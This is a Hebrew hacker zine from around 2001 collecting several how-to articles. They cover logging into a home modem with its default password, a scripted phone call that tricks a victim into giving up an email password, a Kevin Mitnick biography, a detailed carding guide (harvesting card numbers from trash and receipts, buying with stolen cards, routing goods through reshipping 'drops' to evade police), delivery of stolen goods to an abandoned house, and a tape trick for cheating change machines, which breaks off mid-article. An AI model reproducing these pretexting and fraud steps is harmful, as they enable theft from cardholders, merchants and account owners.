‫‪ ------------‬עודכן ביום חמישי‪ ------------- 22/02/01 ,‬ע"י פירסינג ‪-------------------------‬‬‫זוכרים שכתבתי למעלה שעושים למודם אורכית (‪ )restart‬ריבוט ע"י הוצאה מהחשמל ! אל תעשו את‬
‫זה‪.‬‬
‫שמועות הגיעו לאוזני ממקורות פנימיים בחברה אשר מייצרת את המודמים שכשאר מוציאים את‬
‫הכבל‪,‬‬
‫של המודם מהחשמל הוא פוגע בפינים של המודם (‪ .)pin2‬ולאחר הרבה פעמים יכול לגרום לשריפה של‬
‫המודם‪.‬‬
‫אז כמובן אני פה מביא לכם שיטה ממש טובה לאתחל את המודן בלי להוציא אותו מהחשמל‪.‬‬
‫עושים ככה‬
‫‪start -> run -> telnet 10.0.0.138‬‬
‫יפתח לכם טרמינל שהוא בעצם למודם‪.‬‬
‫אם אתם רוצים לעשות ישר ריבוט תכתבו את זה‪ .‬קודם כל תצטרכו סיסמא (לקח לי שנים לגלות‬
‫אותה(לפצח))‬
‫‪password = xxxxxxxx‬‬
‫]‪ )xxxxxxxx] = )password‬כן כן‪ ,‬בזק הדפוקים שמו על המודם את הסיסמא הנפוצה ביותר (‬
‫‪.)password‬ץ‬
‫אז הססימא היא ‪ password‬ואז אתם יכולים לעשות שתי דברים‪:‬‬
‫‪ .1‬לכתוב ‪ help‬ולקבל את כל התכונות שאפשר לשנות‪,‬‬
‫אבל אני לא ממליץ לגעת שם רק אם אתם יודעים מה אתם עושים‪.‬‬
‫‪ .2‬לכתוב ‪ reset‬ולחכות‪ .‬הוא יתאחל בשבילכם את המודם והכל יהיה בסדר‪.‬‬

‫מקווה שזה תוסף נאה והראה לכם עוד דברים על המודם אורכית ועל בזק‪.‬‬
‫נ‪.‬ב‪ .‬בזק הגבילה את המרכזיות שוב פעם בתאריך ‪ 19/02/01‬אז אם אתם משמ גולשים לאט עכשיו‪,‬‬
‫אז בזק אשמים תתבעו אותם או תתנתקו מהם (זה מה שאני הייתי עושה)‪.‬‬
‫אם אתם באותה מהירות עדיין אז יש לכם מזל ואני כמעט בטוח שכל מי שעם מודם אורכית נשאר‬
‫רגיל‪.‬‬
‫אני מה זה מרחם עליכם ‪ -‬מחזיקי אלקטל !‬
‫‪pirs[i]ng‬‬

‫שימוש בפסיכולוגיה כדי לגנוב סיסמאות‪.‬‬
‫הערות‪/‬אזהרות כלליות‪:‬‬
‫אנו‪ ,‬ארגון ההאקרים הישראלי‪ ,‬לא אחראים לשום נזק שייגרם עקב הקריאה הן בצד המשפטי והן‬
‫בצד הפיזי‪ ,‬כל האחריות מוטלת על הקורא בלבד!‬
‫טקסט זה נכתב על מנת להעביר למשתמש יידע נוסף ולא על מנת לגרום נזק כלשהו!‬
‫יש כיום המון שיטות לגניבת כל מיני סיסמאות בכדי להשיג גישה לכל מיני דברים‪.‬‬
‫אני אראה לכם שיטה אחידה שעובדת להשגת כל סוגי הסיסמאות‪ .‬לא צריכים כל ידע קודם‬
‫במחשבים‪.‬‬
‫מה שכן צריכים זה אמצעי תיקשור כגון אימייל‪ ,‬טלפון‪ ,‬דואר וכו'‪.‬‬
‫איך זה עובד? אני אתן דוגמא‪.‬‬
‫הטלפון בבית של משפחת פדלמן מצלצל‪ .‬מר פדלמן עונה‪ .‬השיחה מתנהלת‪...‬‬
‫מר פדלמן‪ :‬הלו?‬
‫אתם‪ :‬שלום‪ ,‬מדבר מתן מאינטרנט זהב‪.‬‬
‫מר פדלמן‪ :‬אה‪ ,‬אתם אלה שאחראים לאינטרנט שלי‪ ,‬נכון?‬
‫אתם‪ :‬נכון מאוד‪ .‬לכן אני מתקשר‪ .‬האם במקרה ניסית לגשת לאימייל שלך היום?‬
‫מר פדלמן‪ :‬לא‪ ,‬הייתי מאוד עסוק היום‪ ...‬למה?‬
‫אתם‪ :‬הממ‪ ,‬כן‪ ,‬גם אני‪ .‬היו לנו בעיות עם שרת הדואר‪ .‬הוא קרס וכל החשבונות נמחקו‪.‬‬
‫מר פדלמן‪ :‬וואי‪ ...‬מה אתה אומר? אז כמה זמן ייקח עד שאני אוכל לבדוק שוב את האימייל שלי?‬
‫אתם‪ :‬אני מקווה שהכל יתוקן בדקות הקרובות‪ .‬אני אחראי על איסוף המידע מחדש והכנסתו חזרה‬
‫למחשב‪.‬‬
‫האם במקרה את הזוכר מה היה שם המשתמש שלך?‬
‫מר פדלמן‪ :‬שם משתמש?‬
‫אתם‪ :‬כן‪ .‬זה החלק שבא לפני סימן ה @ בכתובת האימייל שלך‪.‬‬
‫מר פדלמן‪ :‬אה‪ .‬הבנתי‪ .‬אם כך אז שם המשתמש שלי הוא ‪.fedelman‬‬
‫אתם‪ :‬יופי‪ ,‬מצויין‪ .‬אני אוסיף את זה ברגע זה‪.‬‬
‫מר פדלמן‪ :‬אוקי‪ ,‬תודה‪.‬‬
‫אתם‪ :‬מה תרצה שתהיה הסיסמא שלך?‬
‫מר פדלמן‪ :‬אני חייב לבחור סיסמא חדשה‪ ,‬או שאני יכול גם להשתמש בישנה?‬
‫אתם‪ :‬איך שנוח לך‪ .‬אתה יכול פשוט להשתמש בישנה‪.‬‬
‫מר פדלמן‪ :‬סבבה‪ .‬הישנה קל לי לזכור‪ .‬זה ‪.qwert‬‬
‫אתם‪ :‬רק רגע‪...‬‬
‫אוקי‪ .‬הכל תקין עכשיו‪ .‬תוכל לבדוק את האימייל שלך בעוד דקה או שתיים‪.‬‬

‫מר פדלמן‪ :‬תודה רבה‪.‬‬
‫אתם‪ :‬אין בעד מה‪ ,‬שיהיה לך יום נעים‪.‬‬
‫מר פדלמן‪ :‬תודה‪ .‬גם לך‪.‬‬
‫סוף שיחה‪-‬‬‫המממממ‪ ...‬תתאמנו עם חברים‪ ,‬עד שהולך לכם חלק‪.‬‬
‫שכל חבר יישחק חלק אחר‪ .‬פעם אחת זה שעובדים עליו‪ ,‬ופעם אחת ההאקר‪.‬‬
‫ככה תתחלפו כל פעם‪ .‬עליכם להשתמש בדימיון‪ ,‬להיות פתוחים למחשבות‪,‬‬
‫ולשים את עצמיכם במצב של מישאתם טוענים שאתם‪.‬‬
‫כדי להיות חלקלקים עליכם להתאמן‪ ,‬להתאמן‪ ,‬להתאמן ולהתאמן‪ .‬תיהנו‪.‬‬
‫‪by wamaw‬‬

‫קטעים מהביוגרפיה של ההאקר‬
‫המפורסם בעולם שסופרו ע"י‬
‫האסיר פיאו לי‪.‬‬
‫כל אותם השנים שלפני ההודאה‪ ,‬לא נתנו לו להגן על עצמו‪.‬‬
‫הגישה לספרייה ‪ -‬אסורה‪ ,‬פגישות ‪ -‬אסורות‪ ,‬שום אמצעי תקשורת‪ .‬שום מחשבים‪ ,‬אפילו לאפ טופ‬
‫מסכן (ללא מודם‪ ,‬ללא יציאות ‪ ,pcmcia‬אפילו ללא פורטים חיצוניים) נראה לסוהרים כצעצוע מסוכן‬
‫מדי בידיו של ההאקר המפורסם‪.‬‬
‫לפעמים הוא היה מקבל לידיו מחשב‪ ,‬לשימוש של כמה ימים‪ ,‬אחרי זאת המחשב היה נלקח ממנו‬
‫והיה מושמד אחרי בדיקה מדוקדקת של וועדה מיוחדת‪.‬‬
‫הוא ישב בכלא במשך יותר ‪ 5‬שנים‪ .‬בית הסוהר של לוס‪-‬אנג'לס‪ ,‬תודות לו הכי מפורסם בעולם‬
‫הווירטואלי‪ .‬כמו כן הכי שמור במדינה כולה‪.‬‬
‫במשך כל אותו הזמן הוא התנגד‪ ,‬ניסה להוכיח את חפותו‪.‬‬
‫"מה שהניע אותי היה סקרנות ילדותית פשוטה‪ ,‬יכולתי להיכנס לביתכם‪ ,‬לעלעל בספרי הספרייה‬
‫שלכם‪ ,‬לפתוח את המקרר שלכם… אבל אני מעולם לא לקחתי דבר"‪.‬‬
‫בספטמבר ‪ 1998‬הוגש נגדו כתב אישום‪ ,‬התובע דרש בידיד של מאתיים שנים מהעולם החיצון…‬
‫רוצח בקליפורניה‪ ,‬במקרה הכי טוב יקבל ‪ 3‬שנות מאסר‪ .‬אילו קווין מיטניק היה רוצח‪ ,‬הוא בטח היה‬
‫משתחרר בפחות זמן‪ .‬אבל‪ ,‬הוא לא רצח אף אחד‪.‬‬
‫ב ‪ 4‬באפריל‪ ,1999 ,‬אסיר בית בכלא הסגור של לוס‪-‬אנג'לס מספר ‪ 89950-012‬קווין דויד מיטניק (נולד‬
‫ב ‪ )6.8.1963‬הודה באשמה והגיע לעסקת טיעון עם הרשויות‪.‬‬
‫"… האם אי פעם שדדו אותך בלילה‪ ,‬בסמטה חשוכה? כאשר יש לך סכין על הגרון‪ ,‬אתה ממש מצטער‬
‫שבכיסים יש לך יש רק גרושים‪ .‬אתה יודע איך זה עובד‪ ,‬אתה יושב ‪ 3‬שבועות‪ ,‬לבד‪ ,‬מת משעמום‪.‬‬
‫אחרי זאת מביאים לך תנ"ך מקומט בכריכה רכה וזוג ספרים של שומרי החוק השנואים‪ ,‬בכל אחד‬
‫מהם‪ ,‬עשרות סיפורים על איך איזה חרא גנב את הארנק מסבתא זקנה ובגלל זה היא לא יכלה לקנות‬
‫לעצמה תרופות ו ‪ 911‬לא יכלו לעזור לה‪ .‬וזהו‪ .‬אתה מבין שאתה כבר לא יכול לצאת מזה‪ .‬אבל‪ ,‬אני‬
‫לא ממש מאמין שהחבר שלנו קנה את זה‪ ,‬הוא הרי גאון מטומטם‪ ,‬יכול להיות שחשב על משהו…"‬
‫הנה לפניכם כרונולוגיה של הפעולות הלא חוקיות הראשוניות של "מלך ההאקרים של כדור הארץ"‪:‬‬
‫שנות השבעים‪ .‬פריקינג (‪ ,)phreaking‬ידוע יותר כפשע הקשור בטלפון‪ ,‬הפיכת הטלפון הביתי שלו‬
‫למאין טלפון ציבורי‪ ,‬בהרמת השפופרת‪ ,‬במקום צליל של קו שומעים קול צרוד של גבר המבקש‬
‫להכניס ‪ 20‬סנט‪.‬‬
‫‪ - 1980‬פריצה לרשת המחשבים של סגל בית הספר שלו‪ ,‬לא נגע לא במאגר הציונים ולא בקבצים‬
‫האישיים של המנהל‪ ,‬קווין ניסה את כוחו בלבד‪.‬‬
‫‪ - 1981‬פריצה מוצלחת לרשת המחשבים של מערכת חיל האוויר במדינתו‪ ,‬מדינת קולורדו‪.‬‬
‫קיבל נזיפה מהרשויות‪.‬‬
‫‪ - 1982‬לא ממש פריצה במובן של מחשבים‪ ,‬קוויו ועוד שני חברי הצליחו לחדור לבניין של חברת‬

‫‪ pacific bell‬ולגנוב ספרי הדרכה של ‪ cosmos’y‬ושל ‪. microport’y‬‬
‫המעצר הראשון ‪ 3 -‬חודשים בלוס‪-‬אנג'לס‪ ,‬במרכז הטיפול בעבריינים צעירים ‪ +‬שנה על תנאי‪.‬‬
‫שבועיים אחרי השחרור‪ ,‬מעצר של ‪ 6‬חודשים על שימוש לא חוקי במחשב האוניברסיטה לצורך גישה‬
‫לרשת ה ‪ arphanet‬של הפנטגון‪.‬‬
‫שחצי שנה הזאת ה ‪ arphanet‬הפכה לרשת לצורכי חינוך בלבד‪ ,‬וקווין לאחד המומחים הטובים‬
‫ביותר בנושא הטלפונים הסולריים ובנושא רשתות מחשבים‪.‬‬
‫"… הוא היה ילדון‪ ,‬אוקי? ואני סחבתי בשבילו ספרים מהספרייה‪ ,‬אז קראו לו עכברוש‪ ,‬הוא נגס‬
‫בסלע מדעי השטן ביהירות רבה‪ .‬הוא עצמו אהב שקראו לו "קונדור"‪ .‬איך שהילדים הלבנים האלה‬
‫אוהבים כינויים קולנועיים…"‬
‫במשך ‪ 5‬השנים הבאות קווין הצליח להימנע מסכסוכים עם החוק‪ ,‬כלפי חוץ‪ ,‬הוא ניהל חיים‬
‫משפחתיים שקטים בעיר קליפורנית קטנה ‪" -‬אלך האלונים" (‪ .)thousand oaks‬סוף האידיליה קרה‬
‫בסמוך לחג המולד בשנת ‪.1987‬‬
‫‪ 3 - 1988‬שנים על תנאי‪ ,‬על גניבת תוכנות מחברת ‪ , santa cruz operation‬בסוף השנה קווין שוב‬
‫מאחורי הסורגים‪ .‬הוא מואשם בגניבת קוד מקור פרטי ממעבדת המחקר של‬
‫‪ digital equipment corporation‬שנמצאת בפאלו אלטה‪ ,‬המטרה הייתה גרסה לא חוקית של מערכת‬
‫ההפעלה ‪ . vms‬דבר זה עלה לקווין בשנת מעצר‪.‬‬
‫חוץ מזה קווין נשלח לקורס של "ריפוי מהתמכרות למחשבים" של ‪ 6‬חודשים‪.‬‬
‫תנאי השחרור‪ :‬לעולם לא להתקרב למחשב עם מודם‪.‬‬
‫אז מיטניק לא מתקרב‪ ,‬משתדל למלא אחרי כללי המשחק‪ .‬הדברים קורים כבאורך פלא‪:‬‬
‫הטלפון של הקצין מבחן מנותק‪ ,‬חשבון הבנק של השופט נעלם‪ ,‬ממאגרי המידע של בית המשפט‬
‫בסנטה קרוז נעלם המידע על מעצרו ומשפטו של קווין‪.‬‬
‫מדברים על כך שבשנת ‪ 1990‬אפילו ראו את קווין בישראל‪ ,‬לשם הוא הגיע בכדי להיפגש עם חבריו‬
‫ההאקרים‪ ,‬למרות האיסור לצאת לחו"ל‪.‬‬
‫בשנים הבאות‪ ,‬חייו של מיטניק נכנסים לנתיב נורמלי‪ ,‬ואז פתאום‪ ,‬מות אחיו‪ ,‬האדם הקרוב אליו‬
‫ביותר‪.‬‬
‫את הפעולות הבאות של מיטניק מסבירים בצורות שונות‪ ,‬יש האומרים שזה ניסיון להלחם בדיכאון‬
‫ויש הטוענים שזה הרצון להשיג כמה שיותר כסף בפרק זמן קצר‪.‬‬
‫בזמן הזה הוא חשוד בבקשה לקבלת מסמכים סודיים ממשרד התחבורה של ארה"ב‪ ,‬הבקשה נענתה‬
‫כיוון שהיא נשלחה ממשטרת המדינה‪.‬‬
‫כמו כן הוא חשוד בפריצה לרשתות הפנטגון וה ‪ fbi‬באותה שנת ‪.1992‬‬
‫מנסים לתלו עליו את האשמה בציתות למחלקת האבטחה של חברת ‪.pacific bell‬‬
‫ה ‪ fbi‬עורך חיפוש בביתו של קווין‪ ,‬המצב מתלקח ומיטניק נעלם למספר שנים‪.‬‬
‫בין השנים ‪ 1994 - 1992‬הוא חי בשקט בסיאטל תחת השם בראיין מריל‪ .‬בתקופה הזאת חושדים‬
‫שהוא אחראי לגניבת מערכות הבקרה של תקשורת סלולרית של החברות ‪ motorola, nokia‬ו‬
‫‪ , .mccaw cellular communication inc‬פריצה של מערכת האבטחה של חברת‬
‫‪ ,sun microsystems‬וגם גניבת גרסת ההרצה של מערכת אבטחת הרשתות ‪. satan‬‬
‫אז הוא כמעט נתפס‪ ,‬המשטרה הצליחה לעלות בחכתה מספר טלפונים סלולריים‪ ,‬ספרים בנושאים‬
‫של מחשבים‪ ,‬רשתות ותקשורת ומכשיר להאזנה לתדר של המשטרה‪.‬‬
‫חג המולד ‪ - 1994‬כמתנת חג החליט קווין להביא לעולם משחק חתול‪-‬עכבר עם אחד המומחים‬
‫הגדולים ביותר בעולם במערכות אבטחה ‪ -‬ציטומו שימומורה‪.‬‬
‫ציטומו לא רק שהיה מוכן למשחק עם קווין אלא גם הכין לו מלכודת‪ ,‬למעשה כל אחד יכל ליפול בפח‬
‫הזה‪ ,‬לא הייתה כאן מטרה לתפוס את קווין‪.‬‬
‫מבחוץ הכל נראה כך‪:‬‬
‫המומחה הבינלאומי לאבטחת מחשבים‪ ,‬ציטומו שימומורה נסע לחופשה לנבדה ו"שכח" לנתק מן‬
‫הרשת את מחשבו המוגן‪ .‬המלכודת הייתה בכך שכל דבר שקרה במחשב תועד בלוג במחשב אחר‪.‬‬

‫כאשר המחשב נפרץ‪ ,‬ציטומו מיד קיבל על כך הודעה‪.‬‬
‫לפי המומחיות של הפריצה‪ ,‬הפיתיון נתפס ע"י מישהו משהו גדול‪.‬‬
‫אם קודם ציטומו לא התכוון לנקום‪ ,‬אך אחרי שלא רק נגנבו ממחשבו קבצים ותוכנות אבטחה‪ ,‬גם‬
‫הושארו הודעות קוליות מעליבות‪.‬‬
‫ציטומו התחיל לפעול לתפיסתו של מיטניק‪ ,‬הוא פנה בבקשת עזרה ל ‪ fbi‬ולבסוף הצליח לגלות את‬
‫מיקומו של מיטניק ברדיוס של ‪ 2‬ק"מ‪.‬‬
‫ב ‪ 15‬בפברואר ‪ 1995‬בשעה ‪ 01.30‬קווין נתפס‪.‬‬
‫ב ‪ 21.01.2000‬קווין שוחרר לבסוף‪ ,‬אבל עדיין אסור לו להשתמש במחשב ולהעביר הרצאות בנושא‬
‫מחשבים ולעבוד בכל משרה הקשורה למחשבים עד ה ‪ ,20.02.2003‬כאשר יהיה חופשי באופן סופי‪.‬‬
‫מעצרו של קווין לא הועיל הרבה בניסיון להפסיק את פעולות ההאקרים‪ ,‬אפילו נתן זיקה לפעולות‬
‫אלו כי במשך מעצרו המון האקרים פרצו לאתרים שונים תחת הסיסמא "חופש לקווין" ‪.free kevin -‬‬
‫‪by boris‬‬

‫כסף חינם‬
‫כאן ‪.e-man‬‬
‫היום אני אכתוב על ‪.carding‬‬
‫‪ carding‬הוא מונח שהומצא לשיטה שבא אנשים קונים בכרטיסי אשראי לא‪-‬שלהם באינטרנט‪.‬‬
‫זהו דבר מאוד מסוכן ולא מומלץ למתחילים שבנינו‪.‬‬
‫אני אכתוב על תהליך ה‪ carding‬מההתחלה‪ ,‬עד הסוף (הטוב והמר)‬
‫אז בואו נתחיל‪.‬‬
‫קודם כל‪ ,‬אתם בטח שואלי‪ ,‬מאיפה לעזאזל אני ישיג אשראי???‬
‫אז הנה התשובה‪:‬‬
‫יש שלוש שיטות שאני יודע עליהן‪ ,‬אני יתחיל מהמומלצת ביותר עד לא הכי מומלצת‪.‬‬
‫‪ )1‬אתם מכירים את החנויות העניות האלה שעדיין משתמשות ב"מגהץ" לחיוב אשראי?‬
‫אלו הן המטרות שלכם! לכו בלילה לפח שמאחורי החנות (לא לשכוח לבוא עם בגדים ישנים‬
‫ושחורים‪,‬פנס ותיק של טיול השנתי )‬
‫קפצו פנימה! אתם תגלו שכרגע קפצתם לאשפה הכי נקייה שראיתם בחיים‪ .‬חוץ מניירות‪ ,‬לא יהיה‬
‫שם כלום‪ .‬בכל מקרה‪ ,‬תפעילו את הפנס שלכם ותתחילו לחפש ניירות קטנים כאלה בצבע אפור‪.‬‬
‫בדרך כלל הם נמצאים איזה חבילה של ‪ 100‬בכל שקית זבל‪ .‬מצאתם? יופי! יש לנו כרגע כרטיסי‬
‫אשראי! (תלוי כמה היו שם)‪ .‬במקרה שבאמצע החיפוש שלכם אתם נתקלים בשומר‪ ,‬אל תזוזו! אם‬
‫הוא שמע אותם‪ ,‬ואומר לכם לצאת‪ ,‬אל תצאו‪ ,‬תתחילו לעשות קולות מפחידים‪ ,‬זה בדרך כלל עובד‬
‫(אתם יודעים‪ ,‬לילה חשוך והוא לבד‪ ,‬הוא מפחד בדיוק כמוכם‪ -‬כי שומרים פשוט לא יודעים מה הם‬
‫רוצים מהחיים שלהם ‪ ,‬או תדחפו לו כמה דולרים(שוחד) )‪ .‬אם הוא עדיין עומד שם ואומר לכם‬
‫לצאת‪ ,‬תכוונו עליו את הפנס שלכם‪ ,‬ובעוד הוא מסתנוור‪ ,‬תברחו משם! ‪ -‬כמו שאתם תברחו ממחבל‬
‫(רק אם אתם יכולים לקחת את השקית‪ ,‬קחו אותה)‪ .‬הגעתם הביתה? אל תצאו מהבית לפחות‬
‫שבועיים (לבית ספר מותר ‪ ):‬מצטער ‪.) ):‬‬
‫‪ )2‬תפרצו‪ ...‬לא ממש לבוא ולשבור חלונות‪ ,‬אני מתכוון ‪ .hacking‬אבל זה רק למי שיודע‪.‬‬
‫‪ )3‬זאת השיטה הכי פחות לא מומלצת‪ .‬אתם מכירים את המכונות להשכרת סרטים נכון? אתם‬
‫יודעים שאחרי שיוצא הסרט גם יוצאת חשבונית שעליה כתוב מספר כרטיס האשראי? עכשיו כן‪ .‬בכל‬
‫מקרה‪ ,‬תעמדו ליד המכונה כאילו אתם רוצים לבחור סרט‪ ,‬וכשמישהו אחר בא ומשכיר סרט‪ ,‬קחו את‬
‫החשבונית ותברחו משם!‬
‫*** רק אם לאותו אחד שבא להשכיר סרט יש כרטיס אשראי בין לאומי (אני יגיד מהם בהמשך) אז‬
‫עושים את השיטה הזאת‪.‬‬
‫אוקי‪ ,‬בהנחה שהגעתם הביתה בריאים ושלמים (טוב‪ ..‬רק שלמים) אפשר להתחיל את המיון! תמיינו‬
‫ככה‪,‬‬
‫כרטיסי אשראי שמתחילים ב‪ 60 ,52 - 51 ,49 - 40 :‬ו ‪( 37‬זה כל מה שאני יודע מהסדרה של ‪ )3‬בצד‬
‫ימין‬
‫כל האחרים‪ ,‬צד שמאל‪.‬‬
‫מה שיש לנו עכשיו זה ככה‪:‬‬
‫צד ימין‪ ,‬כרטיסי אשראי מוכנים לשימוש!!!‬
‫צד שמאל‪ ,‬ערמה של זבל שצריך לשרוף‪.‬‬
‫כשאתם מחליטים שאתם רוצים לקנות תעשו את הדברים הבאים‪:‬‬
‫‪ )1‬תשיגו מחשב שיש לו גישה לאינטרנט והוא לא בבית שלכם (בית ספר וספרייה זה מושלם)‪.‬‬

‫‪ )2‬חובה אישור לעבודה על המחשב הזה‪.‬‬
‫‪ )3‬דרך מילוט שקטה‪.‬‬
‫תביאו אתכם כרטיס אשראי אחד מהרשימה שלכם‪ ,‬כנסו לאתר שבו אתם רוצים לקנות‪ ,‬ותקנו! (אבל‬
‫רק תוכנות להורדה בתשלום! לא לשלוח שום דבר הביתה!!!)‪ .‬במקרה שהאתר רוצה שגם תבחרו‬
‫באיזה סוג כרטיס אשראי אתם משלמים חוץ מהמספר‪ ,‬הנה הסוגים‪:‬‬
‫‪ :49 - 40‬ויזה‬
‫‪ :52 - 51‬מאסטרכארד‬
‫‪ :60‬דיסקברי‬
‫‪ :37‬אמריקן אקספרס‬
‫אם אתם רוצים לקנות דברים שצריך לשלוח הביתה‪ ,‬זה כבר סיפור אחר‪ ,‬אתם צריכים "‪."drops‬‬
‫‪ drops‬הם אנשים בעולם שאליהם אתם שולחים את מה שקניתם והם שולחים את זה אליכם הביתה‪,‬‬
‫ככה המשטרה לא יודעת מה קרה לחבילה‪.‬‬
‫קודם כל אתם צריכים ליצור קשר עם ‪ ,drop‬אני ממליץ לחפש ב‪.irc‬‬
‫אחרי שמצאתם לפחות ‪ 2‬דרופים‪ ,‬תגידו להם (אל תגידו שיש לכם ‪ 2‬דרופים‪ ,‬לכל דרופ תגידו שהוא‬
‫הדרופ היחיד) שאתם צריכים דרופ בלהבלה ותבקשו כתובת‪ .‬יש לכם ‪ 2‬כתובות? מגניב! עכשיו תגידו‬
‫לאחר הדרופים שהוא הולך לקבל חבילה בימים הקרובים והוא צריך לשלוח את זה אליכם הביתה‪,‬‬
‫אבל אל תתנו לו את הכתובת של הבית‪ ,‬אלה את הכתובת של הדרופ השני! לדרופ השני (הכי טוב‬
‫שיהיה ישראלי) תגידו לשלוח לכם את זה הביתה ותנו לו את הכתובת האמיתית‪ .‬אם אתם ממש‬
‫רוצים והדרופ הוא ישראלי‪ ,‬אפשר גם ללכת להפגש איתו אישית ולקחת את החבילה‪ ,‬אני ממליץ על‬
‫זה‪.‬‬
‫אל תשכחו לשלוח לכל דרופ משהו (מתנה בשויי ‪ 20‬דולר תספיק‪ ,‬כמובן מהכרטיס אשראי ולא‬
‫מהכסף שלכם ‪.) ):‬‬
‫אחרי שקיבלתם את החבילה‪ ,‬אל תתחילו להתלהב מזה ולספר לחברים!‬
‫תשמרו את החבילה בסוד עד יום ההולדת שלכם‪ ,‬ורק אז תגידו שקיבלתם את זה ליום ההולדת‪.‬‬
‫תתחדשו‪.‬‬
‫‪]by e-man [i.c.f‬‬

‫עוד שיטה‪ -‬כסף חינם ‪ -‬בלי דרופים‬
‫‪ .1‬אם אין לכם כוח לחפש דרופים שלחו את החבילה לבית נטוש או שעדיין לא‬
‫התיישבו בו וכל‪.‬‬
‫‪ .2‬הכינו מכתב שאומר‪:‬‬
‫__________________________________________________________‬
‫|‬
‫| שלום אני מר "השם שקראתם לעצמכם בהזמנה "‬
‫|‬
‫| מס' ת‪.‬ז‪" .‬מספר"‬
‫|‬
‫| מס' "כרטיס אשראי"‬
‫| מבקש להשאיר את החבילה ליד הדלת כאשר אני לא נמצא בבית‬
‫|‬
‫תודה רבה‬
‫|‬
‫מר " השם שלו "‬
‫|‬
‫חתימה‬
‫|‬
‫|__________________________________________________________‬
‫*סליחה אבל לא היה לי כוח להשלים את הפסים שמשמאל ( מה זה משנה ‪)...‬‬
‫שהכל יראה אוטנטי ואמיתי ‪ .‬כי אם לא חבל עליכם ‪....‬‬
‫‪ .3‬כל יום תבוא ב‪ 7‬אחר הצהרים לבדוק את הבית ואם אתם רואים את החבילה קחו‬
‫אותה ותברחו ‪ ...‬כמה שיותר מהר ‪.‬‬
‫‪]by old-hacker [i.c.f‬‬

‫|‬

‫איך לקבל אינטרנט יותר זול מכולם? מאת ‪e-man‬‬
‫מושגים ‪:‬‬
‫‪ = isp‬ספק אינטרנט ‪.‬‬
‫‪--------------------------‬‬‫אתם בטח יודעם כמה יקר השימוש באינטרנט בישראל‪...‬‬
‫‪ 19$‬לחודש‪..‬‬
‫אחותי‪ ,‬על מה?‬
‫אם אתם חושבים כמוני‪ ,‬זה בשבילכם‪:‬‬
‫התהליך הזה הוא לאמיצים בלבד ויכול לקחת ‪ 3‬חודשים או יותר‬
‫אבל בסוף זה משתלם‪.‬‬
‫הנה ההוראות‪:‬‬
‫‪ )1‬הירשמו לאיזה ‪ isp‬שאתם רוצים לתקופת ניסיון של ‪ 3‬חודשים‪.‬‬
‫‪ )2‬בתקופת ניסיון זו‪ ,‬התלוננו על כל מה שרק אפשר‪ ,‬כל שבוע ‪.‬‬
‫‪ )3‬אחרי שעברו ה‪ 3-‬חודשים המפרכים האלה‪ ,‬ה‪ isp‬שאליו נרשמתם ישאלו אתכם אם תרצו להמשיך‬
‫את תקופת הניסיון‬
‫תגידו שאתם לא רוצים כי ‪ isp‬מתחרה (שאותו תכינו מראש ונסביר עליו בהמשך) הציע לכם מחיר‬
‫טוב יותר‪.‬‬
‫‪ )4‬בינתיים ב‪ isp‬המתחרה‪ ,‬תשאלו אם כדאי לכם לעבור מה‪ isp‬הקודם שנרשמתם אליו ל‪ isp‬הזה‪,‬‬
‫כמובן שתקבלו "כן! בטח!" תגידו שאתם לא בטוחים כי ה‪ isp‬הקודם יותר טוב‪ ,‬הם ישאלו למספר‬
‫טלפון ושם ויגידו ביי‬
‫למחרת תקבלו טלפון מה‪ isp‬המתחרה עם הצעה יותר טובה מה‪ isp‬הקודם!‬
‫תגידו את זה ל‪ isp‬הקודם ותקבלו אינטרנט חינם! (כמובן לא חופשי חודשי אבל גם זה שווה!)‬
‫מה שיוצא לכם זה ככה‪:‬‬
‫‪ isp‬אחד מוזל מאוד עם חופשי חודשי‬
‫‪ isp‬אחר חינם בלי חופשי חודשי‬
‫כל מה שכתוב במאמר זה בדוק על ידי!‬
‫]‪by e-man [i.c.f‬‬

‫מזומן חינם‪ - ...‬איך לעבוד על מכונות שפורטות כסף‬
‫המאמר הזה יעסוק בדבר שכולנו אוהבים וצריכים (לא סקס יא ראש כחול!)‬
‫אני מדבר על ‪$$$‬כסף‪ ,$$$‬מי לא אוהב כסף?‬
‫מי לא צריך כסף?‬
‫מי לא משתמש בכסף?‬
‫אם ענית על אחת מהשאלות האלה "אני"‪ ,‬תעבור למאמר הבא‪.‬‬
‫בכל מקרה‪ ,‬בואו נעבור לחלק הרעיוני‪:‬‬
‫כולנו מכירים את המכונות האלה לפריטת כסף נכון?‬
‫רק תחשבו כמה כסף יש בפנים‪...‬‬
‫בוא נראה איך מכונה כזאת עובדת‪:‬‬
‫כשאתה מכניס שטר של ‪ 20‬שקל (אנחנו תפרנים שכחתם? ‪,) ):‬‬
‫המכונה סורקת אותו כדי למצוא סממנים שנמצאים בתוך השטר עצמו!‬
‫זאת אומרת שאם תכתוב ‪ 50‬שקל על נייר ותכניס אותו למכונה כל מה‬
‫שתקבל יהיה כאב ראש‪:( .‬‬
‫מה שאנחנו רוצים הוא לא לעבוד על המכונה‪,‬‬
‫אלה לא לאפשר למכונה לקחת מאתנו את השטר!‬
‫מכונות כאלה‪* ,‬אחרי* שקראו את השטר ופרטו אותו‪ ,‬רק אז הן בולעות את‬
‫השטר!‬
‫זאת אומרת שאנחנו לא רוצים לתת למכונה לקחת לנו את השטר היקר מכל‬
‫שלנו‪.‬‬
‫איך עושים את זה?‬
‫עכשיו הגענו לחלק המעשי‪:‬‬
‫‪ )1‬הכן לך מראש שטר של הסכום הרצוי (רצוי ‪ 20‬שקל כי מי רוצה להסתובב‬
‫עם ‪ 50‬או ‪ 100‬שקלים בארנק?)‬
‫‪ )2‬מצא את נקודת האמצע של השטר ועטוף אותו במסקנטייפ (סלוטייפ עבה‬
‫במיוחד)‬
‫זאת אומרת‪:‬‬
‫אם ככה נראה השטר‪:‬‬
‫אמצע‬
‫|‪|----------------------------------‬‬
‫‪| 20‬‬
‫|‬

‫|‬
‫|‬
‫|‬
‫|‬
‫|‬
‫שטר‬
‫|‬
‫|‬
‫|‬
‫|‬
‫|‬
‫|‬
‫| ‪20‬‬
‫|‪|----------------------------------‬‬
‫אז ככה יראה השטר אחרי ההדבקה שלנו‪:‬‬
‫אמצע‬
‫===================================‪----------------‬‬
‫‪|------‬‬‫===================================‬
‫‪| 20‬‬
‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫שטר‬
‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫===================================‬
‫|‬
‫===================================‪----------------‬‬
‫‪|------‬‬‫מקרא ‪ < = = :‬מסקנטייפ‬
